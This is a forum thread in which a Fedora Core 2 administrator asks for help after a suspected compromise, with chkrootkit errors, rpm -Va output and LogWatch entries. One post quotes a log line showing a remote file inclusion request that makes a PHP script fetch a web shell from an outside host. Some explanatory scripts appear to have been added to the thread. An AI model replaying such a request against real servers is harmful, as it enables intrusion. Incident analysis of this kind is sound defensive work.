LinuxQuestions.org
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Old 05-25-2005, 08:38 AM   #1
rioguia
Member
 
Registered: Jun 2002
Posts: 411

Rep: Reputation: 30
chkrootkit questions


Can anyone suggest a better solution or explain how to fix these error messages from chkrootkit?

I suspect a Fedora Core 2 box was hacked through an unpatched php program. I have run the latest chkrootkit and get these error messages that seem to relate to unavailable system utilities. I have tried to replace all these by using RPM to force update the following packages from the Fedora Core 2 legacy page:

util-linux-2.12-18.i386.rpm
passwd-0.68-8.1.i386.rpm
net-tools-1.60-25.i386.rpm
initscripts-7.53-1.i386.rpm
procps-3.2.0-1.1.i386.rpm

I next updated them using yum -y update

All goes well but I still get these messages. Can anyone suggest a better solution or explain how to fix these error messages?
Quote:
......
Checking `ldsopreload'... can't exec ./strings-static, not tested
Checking `sniffer'... not tested: can't exec ./ifpromisc
.....
Checking `wted'... not tested: can't exec ./chkwtmp
.....
Checking `z2'... not tested: can't exec ./chklastlog
Checking `chkutmp'... not tested: can't exec ./chkutmp
 
Old 05-25-2005, 10:09 AM   #2
Capt_Caveman
Senior Member
 
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658

Rep: Reputation: 69
Quote:
All goes well but I still get these messages. Can anyone suggest a better solution or explain how to fix these error messages?
Did you compile all the helper apps using 'make sense'? If so, go to the chkrootkit dir and make sure they are present and executable. Also make sure you're running chkrootkit as root.

Quote:
I suspect a Fedora Core 2 box was hacked through an unpatched php program.
What leads you to believe that? Running an unpatched version of PHP is pretty dangerous lately, but could you give us more details on what makes you think you were cracked?

Quote:
I have tried to replace all these by using RPM to force update the following packages from the Fedora Core 2 legacy page:
If you were cracked, simply updating the trojaned binaries with new versions likely won't help; a full re-installation is required. That said, what does rpm -Va output?
 
Old 05-25-2005, 12:14 PM   #3
Dr. Psy
Member
 
Registered: May 2005
Distribution: Slackware 10.1
Posts: 49

Rep: Reputation: 15
With chkrootkit, in order to get those binaries working that said 'can't exec ./strings-static (etc), not tested', they need to be in the same directory as chkrootkit itself, and then you need to CD to that directory and execute chkrootkit from there (./chkrootkit). And then those binaries (which are part of chkrootkit) will work properly :-)
 
Old 05-25-2005, 01:24 PM   #4
rioguia
Member
 
Registered: Jun 2002
Posts: 411

Original Poster
Rep: Reputation: 30
thanks for your help

Capt_Caveman thanks for your response.

Did I compile?
1. Yes, I compiled using "Make Sense"

2. What makes me think I was hacked?
a. LogWatch entries including:
Quote:
GET /phpATM/files/cmd.php.ns?page=http://xthost.info/w00t/shell.txt HTTP/1.1 with
response code(s) 200 200

GET /phpATM/files/cmd.php.ns HTTP/1.1 with response code(s)
and

Quote:
Error: Illegal request...: 1 Time(s)
Buffer I/O error on device fd0, l...: 333 Time(s)
end_request: I/O error, dev fd0, sector...: 348 Time(s)
end_request: I/O error, dev hdc, sector...: 1 Time(s)
hdc: command error: error=0x50...: 1 Time(s)
hdc: command error: status=0x51 { D...: 1 Time(s)
lost page write due to I/O error on fd0...: 1 Time(s)
I tried to download these scripts and they contain references "<title>ZETHA WEB SHELL </title>" (I could email text versions of these scripts)

b. I found files in /var/tmp and /tmp related to rOnin.htm

c. I found processes related to these (I piped these to a .txt file that I don't have access to them right now; I would love to get someone else's opinion on their legitimacy or a pointer to a good resource on standard linux processes that should be running on a server)
d. These entries look like a vulnerability noted at:
http://www.securityfocus.com/archive/1/398536?ref=rss

Regarding the rpm -Va
it noted several discrepancies and that's why I tried to reinstall them using rpm -u --force package name and then updated them using up2date.

Dr. Psy thanks for your response. I may not understand your suggestion to install these binaries in the same directory as chkroot. I followed the instruction in the README file so all the chkroot software is in the same directory. From my Google searches, it was suggested that these error messages were related to compromised utilities used by chkrootkit. Is that wrong?

The README file indicates I can point chkrootkit to a utility installed on a floppy or cdrom disk. Could you point me to a utility disk that I could download that has the utilities?

Thanks again for your kind assistance.

Last edited by rioguia; 05-25-2005 at 01:27 PM.
 
Old 05-25-2005, 01:43 PM   #5
Dr. Psy
Member
 
Registered: May 2005
Distribution: Slackware 10.1
Posts: 49

Rep: Reputation: 15
hmmm...maybe I misunderstood your question.

these programs

Quote:
Checking `ldsopreload'... can't exec ./strings-static, not tested



Checking `sniffer'... not tested: can't exec ./ifpromisc
.....

Checking `wted'... not tested: can't exec ./chkwtmp

.....

Checking `z2'... not tested: can't exec ./chklastlog
Checking `chkutmp'... not tested: can't exec ./chkutmp
are binaries included with chkrootkit, not system utilities. If chkrootkit is not executed in the same directory as the above mentioned binaries, then you will get the exact error message you posted. Which means, that, if chkrootkit is in /bin (for example), then all those programs listed above need to also be in /bin. And when you execute chkrootkit, you need to first cd to /bin. Otherwise, those binaries listed above will not be executed and you will get the error message that you printed.

If this is not your problem, then I apologize. However, if that is the case, then I don't understand your question!
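Dr. Psy's point above is a working-directory issue, and it explains why an absolute path works after a cd but not when the same path is run by cron (cron starts jobs in the user's home directory). The following is an added example, not code from the thread or from chkrootkit: chkrootkit calls its compiled helpers by relative path (./strings-static, ./chkwtmp and so on), so they are looked up in the current directory, not next to the script. The stand-in script written here is constructed to mimic that lookup, and the two runner functions reproduce the two ways of starting it.

```python
"""Added example (not code from the thread or from chkrootkit): why the helper
binaries are found after 'cd /bin/chkrootkit && ./chkrootkit' but not when the
same script is started by absolute path from cron.

chkrootkit runs its compiled helpers by relative path (./strings-static,
./chkwtmp, ...), so they are looked up in the current working directory, not
next to the script. cron starts jobs in the user's home directory, hence
"can't exec". The stand-in script below is constructed to mimic that lookup.
"""
import os
import subprocess
import tempfile

# Constructed stand-in for chkrootkit: checks for one helper relative to cwd.
STAND_IN = """#!/bin/sh
if [ -f ./strings-static ]; then
    echo "Checking ldsopreload... nothing found"
else
    echo "Checking ldsopreload... can't exec ./strings-static, not tested"
fi
"""


def make_stand_in(root):
    """Write the stand-in script and its helper into root; return the script path."""
    script = os.path.join(root, "chkrootkit")
    with open(script, "w") as fh:
        fh.write(STAND_IN)
    with open(os.path.join(root, "strings-static"), "w") as fh:
        fh.write("#!/bin/sh\nexit 0\n")
    return script


def run_like_cron(script, cwd):
    """Absolute path, started from an unrelated directory: what a crontab entry does."""
    proc = subprocess.run(["/bin/sh", script], cwd=cwd, capture_output=True, text=True)
    return proc.stdout.strip()


def run_from_own_dir(script):
    """cd into the tool's directory first, then run it as ./name."""
    tool_dir, name = os.path.split(os.path.abspath(script))
    proc = subprocess.run(["/bin/sh", "./" + name], cwd=tool_dir, capture_output=True, text=True)
    return proc.stdout.strip()


def demo():
    """Return (cron-style output, cd-first output) for the constructed stand-in."""
    with tempfile.TemporaryDirectory() as root:
        script = make_stand_in(root)
        home = os.path.join(root, "home")  # stands in for the cron job's cwd
        os.mkdir(home)
        return run_like_cron(script, home), run_from_own_dir(script)


if __name__ == "__main__":
    cron_out, cd_out = demo()
    print("from cron-like cwd  :", cron_out)
    print("after cd to tool dir:", cd_out)
```

The practical consequence for a crontab is to change directory first, e.g. `0 1 * * * cd /bin/chkrootkit && ./chkrootkit | mail -s "chkrootkit output" me@mydomain.com`. The `-p` option the README mentions is a different matter: it points chkrootkit at trusted copies of the system commands it calls (ls, ps, netstat and so on), for instance on a CD, and does not affect where its own helper binaries are looked up.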
 
Old 05-25-2005, 11:46 PM   #6
rioguia
Member
 
Registered: Jun 2002
Posts: 411

Original Poster
Rep: Reputation: 30
rpm -Va

Dr. Psy
Thanks. You were right, but I don't understand why my approach is wrong. When I cd into /bin/chkrootkit and ./chkrootkit it works fine, but I get the error message when I use my crontab like this:
0 1 * * * /bin/chkrootkit/chkrootkit | mail -s "chkrootkit output" me@mydomain.com
Why does this make a difference?


Capt_Caveman. The output of rpm -Va is very long. Here is some of the output:

.M....G. /dev/sda1
.M...... /dev/shm
......G. /dev/tty0
.M....G. /dev/tty1
.M....G. /dev/tty2
.M....G. /dev/tty3
.M....G. /dev/tty4
.M....G. /dev/tty5
.M....G. /dev/tty6
......G. /dev/tty7
S.5....T c /etc/rc.d/init.d/syslog
S.5....T c /etc/openldap/ldap.conf
S.?..... /usr/lib/libdns.so.11.0.2
S.?..... /usr/lib/libisc.so.7.0.1
S.?..... /usr/lib/libisccc.so.0.1.0
S.?..... /usr/lib/libisccfg.so.0.0.7
S.?..... /usr/lib/liblwres.so.1.1.1
S.5....T c /etc/pam_smb.conf
S.5....T c /etc/ssh/sshd_config
missing /usr/lib/perl5/vendor_perl/5.8.3/i386-linux-thread-multi/auto/mod_perl/.packlist
S.5....T c /etc/httpd/conf.d/webalizer.conf
S.5....T c /usr/share/a2ps/afm/fonts.map
S.5....T c /etc/httpd/conf/httpd.conf
.M...... /var/www/html
missing /lib/modules/2.6.9-1.11_FC2/build/.config
missing /lib/modules/2.6.9-1.11_FC2/build/scripts/.conmakehash.cmd
missing /lib/modules/2.6.9-1.11_FC2/build/scripts/.kallsyms.cmd
missing /lib/modules/2.6.9-1.11_FC2/build/scripts/.pnmtologo.cmd
missing /lib/modules/2.6.9-1.11_FC2/build/scripts/basic/.docproc.cmd
missing /lib/modules/2.6.9-1.11_FC2/build/scripts/basic/.fixdep.cmd
missing /lib/modules/2.6.9-1.11_FC2/build/scripts/basic/.split-include.cmd
missing /lib/modules/2.6.9-1.11_FC2/build/scripts/genksyms/.genksyms.cmd
missing /lib/modules/2.6.9-1.11_FC2/build/scripts/genksyms/.genksyms.o.cmd
missing /lib/modules/2.6.9-1.11_FC2/build/scripts/genksyms/.lex.o.cmd
missing /lib/modules/2.6.9-1.11_FC2/build/scripts/genksyms/.parse.o.cmd
missing /lib/modules/2.6.9-1.11_FC2/build/scripts/kconfig/.conf.cmd
missing /lib/modules/2.6.9-1.11_FC2/build/scripts/kconfig/.conf.o.cmd
missing /lib/modules/2.6.9-1.11_FC2/build/scripts/kconfig/.libkconfig.so.cmd
missing /lib/modules/2.6.9-1.11_FC2/build/scripts/kconfig/.mconf.o.cmd
missing /lib/modules/2.6.9-1.11_FC2/build/scripts/kconfig/.zconf.tab.o.cmd
missing /lib/modules/2.6.9-1.11_FC2/build/scripts/mod/.elfconfig.h.cmd
missing /lib/modules/2.6.9-1.11_FC2/build/scripts/mod/.empty.o.cmd
missing /lib/modules/2.6.9-1.11_FC2/build/scripts/mod/.file2alias.o.cmd
missing /lib/modules/2.6.9-1.11_FC2/build/scripts/mod/.mk_elfconfig.cmd
missing /lib/modules/2.6.9-1.11_FC2/build/scripts/mod/.modpost.cmd
missing /lib/modules/2.6.9-1.11_FC2/build/scripts/mod/.modpost.o.cmd
missing /lib/modules/2.6.9-1.11_FC2/build/scripts/mod/.sumversion.o.cmd
S.5....T c /etc/samba/smb.conf
......G. /var/cache/samba/winbindd_privileged
missing /lib/modules/2.6.10-1.770_FC2/build/.config
missing /lib/modules/2.6.10-1.770_FC2/build/scripts/.conmakehash.cmd
missing /lib/modules/2.6.10-1.770_FC2/build/scripts/.kallsyms.cmd
missing /lib/modules/2.6.10-1.770_FC2/build/scripts/.pnmtologo.cmd
missing /lib/modules/2.6.10-1.770_FC2/build/scripts/basic/.docproc.cmd
missing /lib/modules/2.6.10-1.770_FC2/build/scripts/basic/.fixdep.cmd
missing /lib/modules/2.6.10-1.770_FC2/build/scripts/basic/.split-include.cmd
missing /lib/modules/2.6.10-1.770_FC2/build/scripts/genksyms/.genksyms.cmd
missing /lib/modules/2.6.10-1.770_FC2/build/scripts/genksyms/.genksyms.o.cmd
missing /lib/modules/2.6.10-1.770_FC2/build/scripts/genksyms/.lex.o.cmd
missing /lib/modules/2.6.10-1.770_FC2/build/scripts/genksyms/.parse.o.cmd
missing /lib/modules/2.6.10-1.770_FC2/build/scripts/kconfig/.conf.cmd
missing /lib/modules/2.6.10-1.770_FC2/build/scripts/kconfig/.conf.o.cmd
missing /lib/modules/2.6.10-1.770_FC2/build/scripts/kconfig/.mconf.o.cmd
missing /lib/modules/2.6.10-1.770_FC2/build/scripts/kconfig/.zconf.tab.o.cmd
missing /lib/modules/2.6.10-1.770_FC2/build/scripts/mod/.elfconfig.h.cmd
missing /lib/modules/2.6.10-1.770_FC2/build/scripts/mod/.empty.o.cmd
missing /lib/modules/2.6.10-1.770_FC2/build/scripts/mod/.file2alias.o.cmd
missing /lib/modules/2.6.10-1.770_FC2/build/scripts/mod/.mk_elfconfig.cmd
missing /lib/modules/2.6.10-1.770_FC2/build/scripts/mod/.modpost.cmd
missing /lib/modules/2.6.10-1.770_FC2/build/scripts/mod/.modpost.o.cmd
missing /lib/modules/2.6.10-1.770_FC2/build/scripts/mod/.sumversion.o.cmd
missing /usr/lib/perl5/5.8.3/i386-linux-thread-multi/.packlist
S.5....T c /etc/pam.d/system-auth
missing /lib/modules/2.6.5-1.358/build/.config
missing /lib/modules/2.6.5-1.358/build/scripts/.bin2c.cmd
missing /lib/modules/2.6.5-1.358/build/scripts/.conmakehash.cmd
missing /lib/modules/2.6.5-1.358/build/scripts/.elfconfig.h.cmd
missing /lib/modules/2.6.5-1.358/build/scripts/.file2alias.o.cmd
missing /lib/modules/2.6.5-1.358/build/scripts/.kallsyms.cmd
missing /lib/modules/2.6.5-1.358/build/scripts/.mk_elfconfig.cmd
missing /lib/modules/2.6.5-1.358/build/scripts/.modpost.cmd
missing /lib/modules/2.6.5-1.358/build/scripts/.modpost.o.cmd
missing /lib/modules/2.6.5-1.358/build/scripts/.pnmtologo.cmd
missing /lib/modules/2.6.5-1.358/build/scripts/.sumversion.o.cmd
missing /lib/modules/2.6.5-1.358/build/scripts/basic/.docproc.cmd
missing /lib/modules/2.6.5-1.358/build/scripts/basic/.fixdep.cmd
missing /lib/modules/2.6.5-1.358/build/scripts/basic/.split-include.cmd
missing /lib/modules/2.6.5-1.358/build/scripts/kconfig/.conf.cmd
missing /lib/modules/2.6.5-1.358/build/scripts/kconfig/.conf.o.cmd
missing /lib/modules/2.6.5-1.358/build/scripts/kconfig/.libkconfig.so.cmd
missing /lib/modules/2.6.5-1.358/build/scripts/kconfig/.mconf.o.cmd
missing /lib/modules/2.6.5-1.358/build/scripts/kconfig/.zconf.tab.o.cmd
S.5....T c /etc/krb.conf
S.5....T /usr/bin/dig
S.5....T /usr/bin/host
S.5....T /usr/bin/nslookup
S.5....T /usr/bin/nsupdate
.......T c /etc/yp.conf
S.5....T c /etc/ldap.conf
.......T /usr/lib/security/classpath.security
.......T /usr/lib/security/libgcj.security
S.5....T c /etc/php.ini
.M...... /var/lib/php/session
..5....T c /etc/inittab
missing /lib/modules/2.6.10-1.9_FC2/build/.config
missing /lib/modules/2.6.10-1.9_FC2/build/scripts/.conmakehash.cmd
missing /lib/modules/2.6.10-1.9_FC2/build/scripts/.kallsyms.cmd
missing /lib/modules/2.6.10-1.9_FC2/build/scripts/.pnmtologo.cmd
missing /lib/modules/2.6.10-1.9_FC2/build/scripts/basic/.docproc.cmd
missing /lib/modules/2.6.10-1.9_FC2/build/scripts/basic/.fixdep.cmd
missing /lib/modules/2.6.10-1.9_FC2/build/scripts/basic/.split-include.cmd
missing /lib/modules/2.6.10-1.9_FC2/build/scripts/genksyms/.genksyms.cmd
missing /lib/modules/2.6.10-1.9_FC2/build/scripts/genksyms/.genksyms.o.cmd
missing /lib/modules/2.6.10-1.9_FC2/build/scripts/genksyms/.lex.o.cmd
missing /lib/modules/2.6.10-1.9_FC2/build/scripts/genksyms/.parse.o.cmd
missing /lib/modules/2.6.5-1.358/build/scripts/.empty.o.cmd
missing /lib/modules/2.6.10-1.9_FC2/build/scripts/kconfig/.conf.cmd
missing /lib/modules/2.6.10-1.9_FC2/build/scripts/kconfig/.conf.o.cmd
missing /lib/modules/2.6.10-1.9_FC2/build/scripts/kconfig/.mconf.o.cmd
missing /lib/modules/2.6.10-1.9_FC2/build/scripts/kconfig/.zconf.tab.o.cmd
missing /lib/modules/2.6.10-1.9_FC2/build/scripts/mod/.elfconfig.h.cmd
missing /lib/modules/2.6.10-1.9_FC2/build/scripts/mod/.empty.o.cmd
missing /lib/modules/2.6.10-1.9_FC2/build/scripts/mod/.file2alias.o.cmd
missing /lib/modules/2.6.10-1.9_FC2/build/scripts/mod/.mk_elfconfig.cmd
missing /lib/modules/2.6.10-1.9_FC2/build/scripts/mod/.modpost.cmd
missing /lib/modules/2.6.10-1.9_FC2/build/scripts/mod/.modpost.o.cmd
missing /lib/modules/2.6.10-1.9_FC2/build/scripts/mod/.sumversion.o.cmd
S.5....T c /etc/dovecot.conf
.......T /usr/share/zoneinfo/Africa/Abidjan

SKIPPED PAGES OF DATA LIKE THIS FOR THE ZONEINFO FILES


.......T /usr/share/zoneinfo/right/Zulu
.......T /usr/share/zoneinfo/zone.tab
missing /lib/modules/2.6.10-1.12_FC2/build/.config
missing /lib/modules/2.6.10-1.12_FC2/build/scripts/.conmakehash.cmd
missing /lib/modules/2.6.10-1.12_FC2/build/scripts/.kallsyms.cmd
missing /lib/modules/2.6.10-1.12_FC2/build/scripts/.pnmtologo.cmd
missing /lib/modules/2.6.10-1.12_FC2/build/scripts/basic/.docproc.cmd
missing /lib/modules/2.6.10-1.12_FC2/build/scripts/basic/.fixdep.cmd
missing /lib/modules/2.6.10-1.12_FC2/build/scripts/basic/.split-include.cmd
missing /lib/modules/2.6.10-1.12_FC2/build/scripts/genksyms/.genksyms.cmd
missing /lib/modules/2.6.10-1.12_FC2/build/scripts/genksyms/.genksyms.o.cmd
missing /lib/modules/2.6.10-1.12_FC2/build/scripts/genksyms/.lex.o.cmd
missing /lib/modules/2.6.10-1.12_FC2/build/scripts/genksyms/.parse.o.cmd
missing /lib/modules/2.6.10-1.12_FC2/build/scripts/kconfig/.conf.cmd
missing /lib/modules/2.6.10-1.12_FC2/build/scripts/kconfig/.conf.o.cmd
missing /lib/modules/2.6.10-1.12_FC2/build/scripts/kconfig/.mconf.o.cmd
missing /lib/modules/2.6.10-1.12_FC2/build/scripts/kconfig/.zconf.tab.o.cmd
missing /lib/modules/2.6.10-1.12_FC2/build/scripts/mod/.elfconfig.h.cmd
missing /lib/modules/2.6.10-1.12_FC2/build/scripts/mod/.empty.o.cmd
missing /lib/modules/2.6.10-1.12_FC2/build/scripts/mod/.file2alias.o.cmd
missing /lib/modules/2.6.10-1.12_FC2/build/scripts/mod/.mk_elfconfig.cmd
missing /lib/modules/2.6.10-1.12_FC2/build/scripts/mod/.modpost.cmd
missing /lib/modules/2.6.10-1.12_FC2/build/scripts/mod/.modpost.o.cmd
missing /lib/modules/2.6.10-1.12_FC2/build/scripts/mod/.sumversion.o.cmd
S.5....T /usr/lib/mozilla-1.7.6/searchplugins/google.src
S.5....T c /etc/my.cnf
S.5....T c /etc/xml/catalog
S.5....T c /usr/share/sgml/docbook/xmlcatalog
.......T /usr/bin/addr2name.awk
S.?..... /usr/lib/lib-javax-activation-20030319.so
S.5....T c /etc/ppp/chap-secrets
S.5....T c /etc/ppp/pap-secrets
S.5....T c /etc/sysconfig/pcmcia
..5....T c /etc/sysconfig/system-config-users
.......T /usr/share/system-config-users/groupProperties.pyc
.......T /usr/share/system-config-users/groupWindow.pyc
.......T /usr/share/system-config-users/mainWindow.pyc
.......T /usr/share/system-config-users/messageDialog.pyc
missing /usr/share/system-config-users/selinux.pyc
missing /usr/share/system-config-users/system-config-users.pyc
.......T /usr/share/system-config-users/userGroupCheck.pyc
.......T /usr/share/system-config-users/userProperties.pyc
.......T /usr/share/system-config-users/userWindow.pyc
SM5....T c /etc/sysconfig/rhn/up2date
S.5....T c /etc/sysconfig/rhn/up2date-uuid
S.?..... /usr/lib/lib-org-apache-bcel-5.0.so
S.5....T c /etc/sysconfig/system-config-securitylevel
S.5....T c /etc/X11/gdm/gdm.conf
S.5....T c /etc/sysconfig/rhn/rhn-applet
SM5....T /usr/share/rhn/rhn_applet/rhn_applet.pyc
SM5....T /usr/share/rhn/rhn_applet/rhn_applet_animation.pyc
SM5....T /usr/share/rhn/rhn_applet/rhn_applet_apt.pyc
SM5....T /usr/share/rhn/rhn_applet/rhn_applet_dialogs.pyc
SM5....T /usr/share/rhn/rhn_applet/rhn_applet_model.pyc
SM5....T /usr/share/rhn/rhn_applet/rhn_applet_protocols.pyc
SM5....T /usr/share/rhn/rhn_applet/rhn_applet_rpc.pyc
SM5....T /usr/share/rhn/rhn_applet/rhn_applet_rpm.pyc
SM5....T /usr/share/rhn/rhn_applet/rhn_applet_version.pyc
SM5....T /usr/share/rhn/rhn_applet/rhn_applet_yum.pyc
SM5....T /usr/share/rhn/rhn_applet/rhn_sources.pyc
SM5....T /usr/share/rhn/rhn_applet/rhn_utils.pyc
S.?..... /usr/lib/lib-javax-mail-20031006.so
S.5....T c /etc/postfix/aliases
S.5....T c /etc/postfix/aliases.db
S.5....T c /etc/postfix/main.cf
S.5....T c /etc/postfix/virtual
missing /lib/modules/2.6.10-1.8_FC2/build/.config
missing /lib/modules/2.6.10-1.8_FC2/build/scripts/.conmakehash.cmd
missing /lib/modules/2.6.10-1.8_FC2/build/scripts/.kallsyms.cmd
missing /lib/modules/2.6.10-1.8_FC2/build/scripts/.conmakehash.cmd
missing /lib/modules/2.6.10-1.8_FC2/build/scripts/.kallsyms.cmd
missing /lib/modules/2.6.10-1.8_FC2/build/scripts/.pnmtologo.cmd
missing /lib/modules/2.6.10-1.8_FC2/build/scripts/basic/.docproc.cmd
missing /lib/modules/2.6.10-1.8_FC2/build/scripts/basic/.fixdep.cmd
missing /lib/modules/2.6.10-1.8_FC2/build/scripts/basic/.split-include.cmd
missing /lib/modules/2.6.10-1.8_FC2/build/scripts/genksyms/.genksyms.cmd
missing /lib/modules/2.6.10-1.8_FC2/build/scripts/genksyms/.genksyms.o.cmd
missing /lib/modules/2.6.10-1.8_FC2/build/scripts/genksyms/.lex.o.cmd
missing /lib/modules/2.6.10-1.8_FC2/build/scripts/genksyms/.parse.o.cmd
missing /lib/modules/2.6.10-1.8_FC2/build/scripts/kconfig/.conf.cmd
missing /lib/modules/2.6.10-1.8_FC2/build/scripts/kconfig/.conf.o.cmd
missing /lib/modules/2.6.10-1.8_FC2/build/scripts/kconfig/.mconf.o.cmd
missing /lib/modules/2.6.10-1.8_FC2/build/scripts/kconfig/.zconf.tab.o.cmd
missing /lib/modules/2.6.10-1.8_FC2/build/scripts/mod/.elfconfig.h.cmd
missing /lib/modules/2.6.10-1.8_FC2/build/scripts/mod/.empty.o.cmd
missing /lib/modules/2.6.10-1.8_FC2/build/scripts/mod/.file2alias.o.cmd
missing /lib/modules/2.6.10-1.8_FC2/build/scripts/mod/.mk_elfconfig.cmd
missing /lib/modules/2.6.10-1.8_FC2/build/scripts/mod/.modpost.cmd
missing /lib/modules/2.6.10-1.8_FC2/build/scripts/mod/.modpost.o.cmd
missing /lib/modules/2.6.10-1.8_FC2/build/scripts/mod/.sumversion.o.cmd
missing /lib/modules/2.6.10-1.14_FC2/build/.config
missing /lib/modules/2.6.10-1.14_FC2/build/scripts/.conmakehash.cmd
missing /lib/modules/2.6.10-1.14_FC2/build/scripts/.kallsyms.cmd
missing /lib/modules/2.6.10-1.14_FC2/build/scripts/.pnmtologo.cmd
missing /lib/modules/2.6.10-1.14_FC2/build/scripts/basic/.docproc.cmd
missing /lib/modules/2.6.10-1.14_FC2/build/scripts/basic/.fixdep.cmd
missing /lib/modules/2.6.10-1.14_FC2/build/scripts/basic/.split-include.cmd
missing /lib/modules/2.6.10-1.14_FC2/build/scripts/genksyms/.genksyms.cmd
missing /lib/modules/2.6.10-1.14_FC2/build/scripts/genksyms/.genksyms.o.cmd
missing /lib/modules/2.6.10-1.14_FC2/build/scripts/genksyms/.lex.o.cmd
missing /lib/modules/2.6.10-1.14_FC2/build/scripts/genksyms/.parse.o.cmd
missing /lib/modules/2.6.10-1.14_FC2/build/scripts/kconfig/.conf.cmd
missing /lib/modules/2.6.10-1.14_FC2/build/scripts/kconfig/.conf.o.cmd
missing /lib/modules/2.6.10-1.14_FC2/build/scripts/kconfig/.mconf.o.cmd
missing /lib/modules/2.6.10-1.14_FC2/build/scripts/kconfig/.zconf.tab.o.cmd
missing /lib/modules/2.6.10-1.14_FC2/build/scripts/mod/.elfconfig.h.cmd
missing /lib/modules/2.6.10-1.14_FC2/build/scripts/mod/.empty.o.cmd
missing /lib/modules/2.6.10-1.14_FC2/build/scripts/mod/.file2alias.o.cmd
missing /lib/modules/2.6.10-1.14_FC2/build/scripts/mod/.mk_elfconfig.cmd
missing /lib/modules/2.6.10-1.14_FC2/build/scripts/mod/.modpost.cmd
missing /lib/modules/2.6.10-1.14_FC2/build/scripts/mod/.modpost.o.cmd
missing /lib/modules/2.6.10-1.14_FC2/build/scripts/mod/.sumversion.o.cmd
missing /lib/modules/2.6.10-1.771_FC2/build/.config
missing /lib/modules/2.6.10-1.771_FC2/build/scripts/.conmakehash.cmd
missing /lib/modules/2.6.10-1.771_FC2/build/scripts/.kallsyms.cmd
missing /lib/modules/2.6.10-1.771_FC2/build/scripts/.pnmtologo.cmd
missing /lib/modules/2.6.10-1.771_FC2/build/scripts/basic/.docproc.cmd
missing /lib/modules/2.6.10-1.771_FC2/build/scripts/basic/.fixdep.cmd
missing /lib/modules/2.6.10-1.771_FC2/build/scripts/basic/.split-include.cmd
missing /lib/modules/2.6.10-1.771_FC2/build/scripts/genksyms/.genksyms.cmd
missing /lib/modules/2.6.10-1.771_FC2/build/scripts/genksyms/.genksyms.o.cmd
missing /lib/modules/2.6.10-1.771_FC2/build/scripts/genksyms/.lex.o.cmd
missing /lib/modules/2.6.10-1.771_FC2/build/scripts/genksyms/.parse.o.cmd
missing /lib/modules/2.6.10-1.771_FC2/build/scripts/kconfig/.conf.cmd
missing /lib/modules/2.6.10-1.771_FC2/build/scripts/kconfig/.conf.o.cmd
missing /lib/modules/2.6.10-1.771_FC2/build/scripts/kconfig/.mconf.o.cmd
missing /lib/modules/2.6.10-1.771_FC2/build/scripts/kconfig/.zconf.tab.o.cmd
missing /lib/modules/2.6.10-1.771_FC2/build/scripts/mod/.elfconfig.h.cmd
missing /lib/modules/2.6.10-1.771_FC2/build/scripts/mod/.empty.o.cmd
missing /lib/modules/2.6.10-1.771_FC2/build/scripts/mod/.file2alias.o.cmd
missing /lib/modules/2.6.10-1.771_FC2/build/scripts/mod/.mk_elfconfig.cmd
missing /lib/modules/2.6.10-1.771_FC2/build/scripts/mod/.modpost.cmd
missing /lib/modules/2.6.10-1.771_FC2/build/scripts/mod/.modpost.o.cmd
missing /lib/modules/2.6.10-1.771_FC2/build/scripts/mod/.sumversion.o.cmd
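The `rpm -Va` listing above is long, and most of it is noise (kernel build `.cmd` files, zoneinfo mtimes, /dev nodes). What an incident responder needs is a triage by verify flags: the eight-column field reads S M 5 D L U G T (size, mode, MD5 digest, device, symlink target, user, group, mtime), with `.` for a matching attribute and `?` where rpm could not check; a following `c` marks a config file, and `missing` lines are files that are gone. The script below is an added example, not part of the thread or of rpm; its sample input is constructed from lines quoted in the post above.

```python
"""Added example (not from the thread or from rpm): triage rpm -Va output.

Each line starts with an eight-column verify field (S M 5 D L U G T), a '.'
where the attribute matched and a '?' where it could not be checked, then an
optional file-type letter ('c' = config file) and the path; files that no
longer exist are reported as 'missing'. The sample below is constructed from
lines quoted in the thread.
"""
import re
from collections import defaultdict

FLAG_MEANING = {
    "S": "size", "M": "mode", "5": "MD5 digest", "D": "device",
    "L": "symlink target", "U": "owner", "G": "group", "T": "mtime",
}
VERIFY_RE = re.compile(
    r"^(?P<flags>[SM5DLUGT.?]{8})\s+(?:(?P<ftype>[cdglr])\s+)?(?P<path>/\S+)\s*$"
)
MISSING_RE = re.compile(r"^missing\s+(?P<path>/\S+)\s*$")


def parse_line(line):
    """Return dict(path, flags, ftype, missing), or None for a line that is not rpm -V output."""
    m = MISSING_RE.match(line)
    if m:
        return {"path": m.group("path"), "flags": set(), "ftype": None, "missing": True}
    m = VERIFY_RE.match(line)
    if not m:
        return None
    flags = set(m.group("flags")) - {"."}
    return {"path": m.group("path"), "flags": flags, "ftype": m.group("ftype"), "missing": False}


def classify(rec):
    """Bucket a record by how much it should worry an incident responder."""
    if rec["missing"]:
        return "missing"
    if "?" in rec["flags"]:
        return "unverifiable"      # rpm could not read the file: check permissions, re-run as root
    if rec["ftype"] == "c":
        return "config_changed"    # locally edited config: expected, but diff it against the package copy
    if rec["flags"] & {"S", "5", "L"}:
        return "content_changed"   # non-config payload differs: verify against a trusted package
    return "metadata_only"         # mode/owner/group/mtime only: typical for /dev nodes and zoneinfo


def triage(output):
    """Group every parsed path of an rpm -Va run by classification."""
    buckets = defaultdict(list)
    for line in output.splitlines():
        rec = parse_line(line.strip())
        if rec:
            buckets[classify(rec)].append(rec["path"])
    return dict(buckets)


# Constructed sample, taken from lines quoted in the thread.
SAMPLE = """\
.M....G. /dev/tty1
S.5....T c /etc/ssh/sshd_config
S.?..... /usr/lib/libdns.so.11.0.2
missing /lib/modules/2.6.9-1.11_FC2/build/.config
S.5....T /usr/bin/dig
S.5....T /usr/bin/host
.......T /usr/share/zoneinfo/zone.tab
SM5....T /usr/share/rhn/rhn_applet/rhn_applet.pyc
"""

if __name__ == "__main__":
    for bucket, paths in sorted(triage(SAMPLE).items()):
        print(f"{bucket}:")
        for p in paths:
            print("   ", p)
```

The `content_changed` bucket is the one to read first: binaries such as /usr/bin/dig and /usr/bin/host showing `S.5` without a `c` mean their contents no longer match what the package manager installed. That is not proof of tampering (prelink is a known benign cause of size and digest differences on binaries, and an update that bypassed the rpm database would produce the same), but it is exactly the set of files to compare against a pristine package with `rpm -Vp` on a known-good copy. Bear in mind that `rpm -Va` run on a suspect host relies on that host's rpm binary and database, so a clean result is only as trustworthy as they are, which is why the advice in this thread to reinstall still stands.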
 
Old 05-25-2005, 11:49 PM   #7
Capt_Caveman
Senior Member
 
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658

Rep: Reputation: 69
Re: thanks for your help

Quote:
